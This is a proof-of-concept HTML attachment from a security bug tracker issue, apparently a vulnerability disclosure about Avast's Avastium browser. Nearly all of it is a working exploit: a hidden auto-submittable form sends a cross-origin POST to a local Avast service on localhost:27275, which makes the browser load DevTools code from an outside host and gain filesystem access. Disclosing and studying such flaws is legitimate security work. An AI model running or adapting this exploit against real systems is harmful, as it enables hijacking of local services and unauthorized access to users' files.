New issue
Advanced search Search tips

Issue 679 attachment: avastium_demo.html (714 bytes)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<html>
<head>
<title>Avast! Avastium Vulnerability PoC</title>
</head>
<body>
<p>
This is a harmless testcase that will print the contents of C:\ to prove filesystem access.
<p>
You don't need to run this in Avastium, Chrome is fine, Avastium will be automatically spawned.
<p>
<a href="javascript:document.getElementById('exploit').submit()">Click here</a> to start the Demonstration

<form style="display: none" id=exploit method=post enctype="text/plain" action="http://localhost:27275/command">
<input name="uchrome-devtools://devtools/bundled/inspector.html?remoteBase=https://lock.cmpxchg8b.com/xour2Iab/&remoteFrontend=true" value="">
</form>
</body>
</html>